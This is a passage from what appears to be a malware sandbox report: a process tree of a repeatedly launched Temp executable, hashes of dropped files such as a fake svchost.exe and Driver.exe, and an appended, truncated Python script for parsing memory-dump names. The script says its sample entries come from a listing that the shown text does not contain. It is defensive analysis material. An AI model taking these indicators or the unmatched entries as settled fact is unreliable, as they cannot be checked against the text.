                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                            1⤵
                                                                              PID:6520
                                                                            • C:\Windows\system32\werfault.exe
                                                                              werfault.exe /h /shared Global\868ca247253f4484be57e8b5fd7e6602 /t 12400 /p 6520
                                                                              1⤵
                                                                                PID:10116
                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                1⤵
                                                                                  PID:13044
                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                  1⤵
                                                                                    PID:5312
                                                                                  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                    1⤵
                                                                                      PID:9280
                                                                                    • C:\Windows\system32\werfault.exe
                                                                                      werfault.exe /h /shared Global\2911ce4e26164c579262fa4318dcbac7 /t 0 /p 5312
                                                                                      1⤵
                                                                                        PID:13752
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                          PID:5908
                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                          1⤵
                                                                                            PID:4244
                                                                                          • C:\Windows\system32\werfault.exe
                                                                                            werfault.exe /h /shared Global\870e5c47d0694313a84d0ff31357f986 /t 0 /p 5908
                                                                                            1⤵
                                                                                              PID:10024
                                                                                            • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                              1⤵
                                                                                                PID:13268
                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                1⤵
                                                                                                  PID:4568
                                                                                                • C:\Windows\system32\werfault.exe
                                                                                                  werfault.exe /h /shared Global\ee8e0c58aa8d40d49f1545a90c023607 /t 14056 /p 4568
                                                                                                  1⤵
                                                                                                    PID:6320
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                    1⤵
                                                                                                      PID:9256
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                      1⤵
                                                                                                        PID:13208
                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                        1⤵
                                                                                                          PID:10680
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                          1⤵
                                                                                                            PID:10472
                                                                                                          • C:\Windows\system32\werfault.exe
                                                                                                            werfault.exe /h /shared Global\f89acc53030e4b18a9a7ed1b1c1f21b8 /t 0 /p 10680
                                                                                                            1⤵
                                                                                                              PID:5360
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                              1⤵
                                                                                                                PID:13712
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                1⤵
                                                                                                                  PID:10100
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                  1⤵
                                                                                                                    PID:11844
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                      PID:9420
                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                      werfault.exe /h /shared Global\10278a8c5a5246bdaa567c115d5fc0cc /t 4648 /p 9420
                                                                                                                      1⤵
                                                                                                                        PID:10756
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                        1⤵
                                                                                                                          PID:9920
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                          1⤵
                                                                                                                            PID:11292
                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                            1⤵
                                                                                                                              PID:9732
                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                              werfault.exe /h /shared Global\27814c10e5734d99a1c6def4799f942e /t 0 /p 9732
                                                                                                                              1⤵
                                                                                                                                PID:13048
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                1⤵
                                                                                                                                  PID:6892
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:11860
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                    1⤵
                                                                                                                                      PID:6684
                                                                                                                                    • C:\Windows\system32\werfault.exe
                                                                                                                                      werfault.exe /h /shared Global\cd31c822228f4f129cd92e5ea4c3360e /t 0 /p 6684
                                                                                                                                      1⤵
                                                                                                                                        PID:15528
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:12608
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:2928
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:10720
                                                                                                                                            • C:\Windows\system32\werfault.exe
                                                                                                                                              werfault.exe /h /shared Global\1eac46229587436da10939eaf1af2586 /t 9856 /p 10720
                                                                                                                                              1⤵
                                                                                                                                                PID:13760
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:9016
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:10148
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2736
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:14088
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:9524
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:9276

Network

MITRE ATT&CK Enterprise v15


Downloads

• C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Blaze.Udk
  Filesize: 53KB
  MD5: d2401f10a4fbfda63177af824b7e96cb
  SHA1: 6f8b9073b641d60e9045865e585efe1085d72d1b
  SHA256: dd35b93d3d04cce7fd02df183e70ed55194bd0b20fb051c324d9d869668ebce7
  SHA512: 4813c9367af384c07daef5a55f98f3156c0351973dbed0a8ac10fcd13bc1b443d2ec0c2d872e293bd65e74a5b1fcf1072054c222ee0adb83cc90fdec2e95f18b

• C:\Users\Admin\AppData\Local\Kbmandslivenes110\jesuitical\colourama\Multiplikatoren.Pri
  Filesize: 343KB
  MD5: f344871c6ad32e2b5349eb4c277f85d9
  SHA1: 9298a5f90e75af375807bfc2df002d4ec88da098
  SHA256: df634370973767c3fcc098bc48e4efd2a45d83af800db964fb659356b9a33096
  SHA512: 3d0d7c159aa899039c399d1a59ca527fb78511445c8d4344146a1e4e3ac74b11801b8ad913d1196f9496a31460f8039476b1d2d667f7540c841ae1455726f198

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 1cfe572f8a58e5c315192b2262b19389
  SHA1: 0ee01be5ceb2f4c1769d1461a33900abb85879ea
  SHA256: a166e551d09fc5f77e4ede547e3dc521b71f4b5c07b93f16de2b0f976fed6751
  SHA512: 7820fe3c45dd79a37c31d4a5a03a167b254f0e2eb5b9acf374944ffbebc3e2c919d494cdfcbf7d4d9e8142dac21d1c0e1c7e56fbfe337e8336e5302d88bcaa2f

• C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\L5P12AEX\edgecompatviewlist[1].xml
  Filesize: 74KB
  MD5: d4fc49dc14f63895d997fa4940f24378
  SHA1: 3efb1437a7c5e46034147cbbc8db017c69d02c31
  SHA256: 853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
  SHA512: cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 2f6be89e5d31cd0b5993346f3ccb1285
  SHA1: 3e6fdc8bc0cc8072c99e29f34908ca2fc7e0eb35
  SHA256: 990ee94cd03a3e5401d456d4b8cc13a7ff88964bc8de4d01d27117e10681b2a2
  SHA512: 4c98a58c27fe6832932696f9238cea5c9bda9a973e5f6a818f1ca29dbb97ba39baac6f14ae737d83e2bd95bc01daa9a65070588ca44dc523192bd0e2403acf96

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: b8ba27c43b0ec6d693ef7c6e8302b9d2
  SHA1: fb4cc91cb54bf469ee983194e29de7ff62870f3e
  SHA256: 766c3ef3ef6b04d6a477f533e8d3c54fd54e09eae40b70259aa6650e5496fe33
  SHA512: 0ed31102b7fbb445ba24dc031f2e12cae982733b5c295cce4fbacbafb87020c12b627973b622493c4091121344736d52daa664a369727d02cbdaccbb99c2e6a4

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 198ac4f39f7f980d8847fd5c4a6e0759
  SHA1: 72d99b5fcec6f7198576119d63a404cb0a769621
  SHA256: 3b3b556d711e90d7982b2cced8cac24eea79982ed03472be66b90f85f47bfb98
  SHA512: 38456a20558fc053a9731677af843ef78e43ca1ee3fa93bbb4e1ee93bddf2101994cbbfb0a41434f7ad78954cd0547e471069fd2b1c1342a8333277cbb816590

• C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\TABYYGGX\suggestions[1].en-US
  Filesize: 17KB
  MD5: 5a34cb996293fde2cb7a4ac89587393a
  SHA1: 3c96c993500690d1a77873cd62bc639b3a10653f
  SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
  SHA512: e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

• C:\Users\Admin\AppData\Local\Temp\6.exe
  Filesize: 4.8MB
  MD5: 5bb3677a298d7977d73c2d47b805b9c3
  SHA1: 91933eb9b40281e59dd7e73d8b7dac77c5e42798
  SHA256: 85eb3f6ba52fe0fd232f8c3371d87f7d363f821953c344936ab87728ba6a627f
  SHA512: d20f862e9fadb5ad12eddaae8c6ebbfa03d67d35c5ca272e185206eb256cd6a89c338ce608c992df715d36a3f1624a507dbe324a057bd412b87438f4a008f33d

• C:\Users\Admin\AppData\Local\Temp\Confirmed
  Filesize: 21KB
  MD5: aa910cf1271e6246b52da805e238d42e
  SHA1: 1672b2eeb366112457b545b305babeec0c383c40
  SHA256: f6aeee7fbc6ce536eef6d44e25edf441678d01317d0153dd3bda808c8c0fd25c
  SHA512: f012780499c4a0f4bf2a7213976f66ec1769cf611d133f07204c2041b9d6804875b50e37e42feb51073868d5de503e35abbef4682c3191ae0a7b65ff14a64a07

• C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
  Filesize: 36B
  MD5: ce32eea7c273547d3fb75f8e4191e25a
  SHA1: 07d0edd1f64c799b01da4e670126b4b2c5091dde
  SHA256: 940d3c2d3a6665d5017c0bf64120a71b2ce61106ae015399282ae8f4656cb91f
  SHA512: 56da0be9e79b98fb276a6d5a26b2fe06035d46e299fc6e6cb4e04bb396d119204881518e93f2184a68aa34ff024f81281f131ff0f98cf39541cf857c96da95d4

• C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
  Filesize: 4.4MB
  MD5: 8866d677a3309a0ad903f37557c5941b
  SHA1: 2b03d0c6cb74defedfc31154c57b073c889ea11a
  SHA256: ecbccacd00cdf38870bea7d203909da1ea2261477125ff7e0bdcef5f3fc4d17d
  SHA512: 15535e08a5e224941610c90f0ba3921bb3a1911380889d393aedbc2e4806910171c81005cda27d23466292daec606abcb94d0fbf546430d70ea21de15cfe406e

• C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
  Filesize: 4.0MB
  MD5: bd2413c32e34d0031f7881d51ae731ff
  SHA1: 8771733c460f22adc0e1865f0b3f2ac19e9c1001
  SHA256: 277e5a809506398685fe20ba674b7f3f75b2e04a34c2b150a84088b266138894
  SHA512: 612c8b9f86308b13342cef00b9166084bf36f44addd139a0123f84cf9711fb2f03e15e4a0b3d95a6deaafb60bca1cc1436514b2b96f4aaf18b094534c94974cf

• C:\Users\Admin\AppData\Local\Temp\SetupWizard-66b0c80010508c0a\SetupWizard.exe
  Filesize: 41.6MB
  MD5:      238d13dbf889e407adfb6875aa27c95c
  SHA1:     62454d8c236cfe8ad1e62f90cfa3e28316a89be7
  SHA256:   e57f7b0a1101946b2dae8d06249e9736e2093a208cd508266f41a8b2df185526
  SHA512:   70afaf2344e962d1bcfbb221e3139226bdd2af3d7bbe040172e70d13b6df25a2f68dac9309435fe23edaa1c7e570eaceece1cf01b36cdab39722216f1dc21514

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uix4k0dv.mbt.ps1
  Filesize: 1B
  MD5:      c4ca4238a0b923820dcc509a6f75849b
  SHA1:     356a192b7913b04c54574d18c28d46e6395428ab
  SHA256:   6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512:   4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

• C:\Users\Admin\AppData\Local\Temp\a\0x3fg.exe
  Filesize: 415KB
  MD5:      c4aeaafc0507785736e000ff7e823f5e
  SHA1:     b1acdee835f02856985a822fe99921b097ed1519
  SHA256:   b1d5b1e480a5731caacc65609eaf069622f1129965819079aa09bc9d96dadde5
  SHA512:   fbaefbce3232481490bce7b859c6c1bafd87ee6d952a2be9bf7c4ed25fe8fc9aff46c2246e247aa05ce8e405831a5905ca366c5333ede0af48f9a6287479a12d

• C:\Users\Admin\AppData\Local\Temp\a\1.exe
  Filesize: 224KB
  MD5:      b96f0135250aab5a530906d079b178e1
  SHA1:     0247f3518116f23386796fc14991825dddfe1db8
  SHA256:   004eeca29e9a5bf7e40352873677e4a816e4efea504d96a3c308711fc5ada749
  SHA512:   244f56d2afd174f7f4e6430fcaa72d973b849a966d5df398d9a4120179dea9710689ed6d62a67e6adf4649a62cdec74ccd42de7e2f67e697ee3d1b50519fc4bd

• C:\Users\Admin\AppData\Local\Temp\a\ChatLife.exe
  Filesize: 2.4MB
  MD5:      033e16b6c1080d304d9abcc618db3bdb
  SHA1:     eda03c02fb2b8b58001af72390e9591b8a71ec64
  SHA256:   19fcb719130f0edd27552e014d5b446e85faabe82611311be6dbe28d33463327
  SHA512:   dbed8360dadb8d1733e2cf8c4412c4a468ade074000906d4ea98680f574ed1027fc326ccb50370166d901b011a140e5ee70fb9901ff53bf1205d85db097f1b79

• C:\Users\Admin\AppData\Local\Temp\a\FirstZ.exe
  Filesize: 2.5MB
  MD5:      ffada57f998ed6a72b6ba2f072d2690a
  SHA1:     6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f
  SHA256:   677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12
  SHA512:   1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

• C:\Users\Admin\AppData\Local\Temp\a\SetupWizard.exe
  Filesize: 35.6MB
  MD5:      2396be52963d4de299555880b2723f04
  SHA1:     c7e3071e225f4ce93b390b11433d9cae8f07c726
  SHA256:   3e788961bac4517e3ecbf9a86fa233bf91231aba503aea8843867e8f3453458a
  SHA512:   6e94d73b7b4a6058056f55b6e3bf979abcd2602da65f3b8d664503f8d703e0ee88b1fa5042be875e1a6d302612364455d36d790e7c697f4fe1cae007a2f403ff

• C:\Users\Admin\AppData\Local\Temp\a\ama.exe
  Filesize: 297KB
  MD5:      5d860e52bfa60fec84b6a46661b45246
  SHA1:     1259e9f868d0d80ac09aadb9387662347cd4bd68
  SHA256:   b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30
  SHA512:   04ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701

• C:\Users\Admin\AppData\Local\Temp\a\gui.exe
  Filesize: 527KB
  MD5:      8af55ab72dc0c45e52c7af0752cbbc4a
  SHA1:     227539093c2ca889a1f45e31fb124911d2de6519
  SHA256:   243e063270a045632b688cf570c2e9a8b4c3d2705726ad6b2ebf312e9f278e0e
  SHA512:   05ed4192b47c7c007712b2266d739a684b33f4d10ee77a10fdd15d9952ac23309d8ea2045efe80e59a14adddd196ca596a4f39d5963ebc8ad95969a2c4b7cbcd

• C:\Users\Admin\AppData\Local\Temp\a\limba.exe
  Filesize: 4.6MB
  MD5:      fff6606d4a13b7a04f736a68e3277c2b
  SHA1:     d1d9c3db1313414e03d2ab895ca864bb9ce6ddd8
  SHA256:   69bedfdccfbfccac91697383a8f7456eda4eefd2dc8abd6429b09d2a8b61d0f1
  SHA512:   2c1475801f896f3b9385f5bccec9129b3c48817747a5466a13a79616206e1315a9291becf90c055beb96d8b85e3858272c9d10144c99e6f9e608aec351d94e6c

• C:\Users\Admin\AppData\Local\Temp\a\pic1.exe
  Filesize: 4.8MB
  MD5:      1fecbc51b5620e578c48a12ebeb19bc2
  SHA1:     94fe551f4fb3ff76a0be99a962dc20fc2656453e
  SHA256:   9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
  SHA512:   ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7

• C:\Users\Admin\AppData\Local\Temp\a\setup.exe
  Filesize: 36.5MB
  MD5:      0e12bdd2a8200d4c1f368750e2c87bfe
  SHA1:     6c8b533e2c7f6ebef027971c3a06f4c55ed64cfe
  SHA256:   af77c0b6a10ac159b0e3c87c02e16a2b44daab8e67fe097327e90ae48f814403
  SHA512:   909f15876f3a6cbe608eb53df4286927b013c45ff6acbc496a1590b9cc3fe47b1bb449ed45c3302f6d03cccb876cd2cc26f2b5e7c1ca4ff2d17dd4dee77bf75b

• C:\Users\Admin\AppData\Local\Temp\a\setup222.exe
  Filesize: 96KB
  MD5:      8677376c509f0c66d1f02c6b66d7ef90
  SHA1:     e057eddf9d2e319967e200a5801e4bbe6e45862a
  SHA256:   f7afac39d2754ac953bf129ee094c8b092e349cdf35f1ba23c2c76a0229f9e96
  SHA512:   e0c685e289c10a48b5fa251aa4414653c103dac69faf536b9ae9598e066aab5a03b03c09096c42a0f244aeaf80f2b9e4aa28d6b28da436587a3f52a9155473d0

• C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
  Filesize: 444KB
  MD5:      39d865aa4171442b417c40479e63a03f
  SHA1:     0da788f33274472b1b2217a31301eddd95c7e77c
  SHA256:   0e4db144b872080e865f2ce5d7dc2edeb47eb304d109c3f16c82c04ce626644f
  SHA512:   619e5585a51dd03bddef2a67e7bbce0742266750548004a4c664715d5a217fd9477de22c91218b39a6c5d957ec1f4fb3a6743ebf9ad86814632e55750cd4ca82

• C:\Users\Admin\AppData\Local\Temp\a\taskweaker.exe
  Filesize: 5.8MB
  MD5:      6c149b39619395a8ba117a4cae95ba6f
  SHA1:     3ef8be98589745ecce5522dd871e813f69a7b71b
  SHA256:   c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8
  SHA512:   866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4

• C:\Users\Admin\AppData\Local\Temp\a\version.txt
  Filesize: 1B
  MD5:      c81e728d9d4c2f636f067f89cc14862c
  SHA1:     da4b9237bacccdf19c0760cab7aec4a8359010b0
  SHA256:   d4735e3a265e16eee03f59718b9b5d03019c07d8b6c51f90da3a666eec13ab35
  SHA512:   40b244112641dd78dd4f93b6c9190dd46e0099194d5a44257b7efad6ef9ff4683da1eda0244448cb343aa688f5d3efd7314dafe580ac0bcbf115aeca9e8dc114

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup-1fbfaf8ef9c1de1d\setup.exe

                                                                                                                                                            Filesize

                                                                                                                                                            41.6MB

                                                                                                                                                            MD5

                                                                                                                                                            312c3e03890f7d5242fe2158acabd4e8

                                                                                                                                                            SHA1

                                                                                                                                                            d148cf18f876b55c03f2718bfff321b7d6287f87

                                                                                                                                                            SHA256

                                                                                                                                                            6ac290f077cd4228dff7dc37a4c37e0a675207ad345543e8cd01008ce67ea751

                                                                                                                                                            SHA512

                                                                                                                                                            da0e5c199a7ab586a17dd7b74cc4b6727ac5c9efcb3397b45f8806a6418c20bfc7515804ca10e2a9c52b207b56f3a56c86e3c3be646ffe27f988c59b0bc66971

                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe

                                                                                                                                                            Filesize

                                                                                                                                                            2.5MB

                                                                                                                                                            MD5

                                                                                                                                                            4691a9fe21f8589b793ea16f0d1749f1

                                                                                                                                                            SHA1

                                                                                                                                                            5c297f97142b7dad1c2d0c6223346bf7bcf2ea82

                                                                                                                                                            SHA256

                                                                                                                                                            63733ff3b794ebd7566103c8a37f7de862348ffacf130661f2c544dea8cde904

                                                                                                                                                            SHA512

                                                                                                                                                            ee27d5912e2fb4b045ffd39689162ab2668a79615b2b641a17b6b03c4273070a711f9f29dd847ffff5ae437d9df6102df6e10e898c36d44ec25e64ba1dd83386

                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

                                                                                                                                                            Filesize

                                                                                                                                                            3.9MB

                                                                                                                                                            MD5

                                                                                                                                                            02569a7a91a71133d4a1023bf32aa6f4

                                                                                                                                                            SHA1

                                                                                                                                                            0f16bcb3f3f085d3d3be912195558e9f9680d574

                                                                                                                                                            SHA256

                                                                                                                                                            8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

                                                                                                                                                            SHA512

                                                                                                                                                            534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

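The memory-region names in this report follow the pattern memory/<pid>-<index>-0x<start>-0x<end>-memory.dmp, and the 1-byte version.txt above is small enough that its content is fully determined by its hashes. The script below is an added example, not part of the sandbox report or any tool it references: it parses the region names, recomputes each size from the address range and checks it against the reported Filesize, groups the ranges per process and flags regions that start at a linker default image base (0x400000, 0x10000000, 0x140000000), which in a sandbox dump are usually an unpacked or injected PE image rather than heap. The default-base and high-address heuristics are general Windows/PE knowledge, not something the report states, and the sample entries are copied from the listing above.

```python
"""Added example: parse the memory-region and file entries of the report above.

The ``memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp`` naming is read straight
off the listing; the image-base heuristics are general PE/Windows facts and
are an interpretation, not anything the sandbox itself asserts.
"""
import hashlib
import re

# A subset of the region entries from the report above (name, reported Filesize).
REPORT_ENTRIES = [
    ("memory/612-1-0x0000000000A20000-0x0000000000A28000-memory.dmp", "32KB"),
    ("memory/612-3-0x00007FFA76480000-0x00007FFA76E6C000-memory.dmp", "9.9MB"),
    ("memory/668-89-0x0000000140000000-0x0000000140848000-memory.dmp", "8.3MB"),
    ("memory/668-186-0x0000000140000000-0x0000000140848000-memory.dmp", "8.3MB"),
    ("memory/888-181-0x0000000000400000-0x0000000000863000-memory.dmp", "4.4MB"),
    ("memory/1072-304-0x00000000046F0000-0x0000000004726000-memory.dmp", "216KB"),
    ("memory/1732-175-0x0000000010000000-0x0000000010362000-memory.dmp", "3.4MB"),
]

# MSVC linker default image bases.  A dumped region that starts exactly here
# is very often a PE image mapped at its preferred base (unpacked payload or
# injected image) and is the first thing to pull for static analysis.
# Heuristic based on general PE knowledge, not stated by the report.
DEFAULT_IMAGE_BASES = {
    0x00400000: "x86 EXE default base",
    0x10000000: "x86 DLL default base",
    0x140000000: "x64 EXE default base",
}

MEMORY_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<idx>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_memory_name(name):
    """Split a dump name into pid, dump index and the dumped address range."""
    m = MEMORY_RE.match(name)
    if m is None:
        raise ValueError(f"not a memory dump name: {name}")
    start, end = int(m["start"], 16), int(m["end"], 16)
    if end <= start:
        raise ValueError(f"inverted or empty range in {name}")
    return {"pid": int(m["pid"]), "index": int(m["idx"]),
            "start": start, "end": end, "size": end - start}


def human_size(n):
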